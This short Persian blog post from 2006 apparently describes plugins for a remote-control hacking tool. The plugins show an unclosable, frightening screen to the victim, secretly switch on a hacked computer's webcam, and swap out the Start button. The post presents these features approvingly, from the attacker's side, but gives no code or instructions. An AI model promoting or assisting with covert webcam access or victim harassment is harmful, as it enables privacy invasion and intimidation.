پلاگین Matrix : یک صفحه بر روی مانیتور قربانی ظاهر میشود که غیر قابل بستن هستش و ترس زیادی را در قربانی به وجود میاره
پلاگین JWebCam :در صورتی که کامپیوتر هک شده دارای دوربین باشه شما میتونید اونو مخفیانه به کار بندازید
پلاگین Button : بااستفاده از این پلاگین شما میتوانید به جای دکمه start عکس های مختلف بگذارید و کلآ start Button رو عوض کنید

+ نوشته شده در 2006/8/20 ساعت 1:10 توسط محمد ملکشاهی  | 
مطالب قدیمی‌تر